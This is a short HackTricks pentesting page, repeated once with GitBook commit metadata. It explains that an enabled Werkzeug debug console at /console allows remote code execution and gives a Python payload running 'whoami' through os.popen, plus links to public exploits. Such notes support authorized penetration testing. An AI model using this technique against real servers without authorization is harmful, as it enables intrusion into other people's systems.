hacktricks/pentesting/pentesting-web/werkzeug.md

# werkzeug

If debug is active you could try to access to `/console` and gain RCE.

```python
__import__('os').popen('whoami').read();
```

![](../../.gitbook/assets/image%20%28348%29.png)

There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.
GitBook: [master] 2 pages and one asset modified 2020-07-30 18:28:28 +00:00			`# werkzeug`

			If debug is active you could try to access to `/console` and gain RCE.

			```python
			`__import__('os').popen('whoami').read();`
			```

			`![](../../.gitbook/assets/image%20%28348%29.png)`

			`There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.`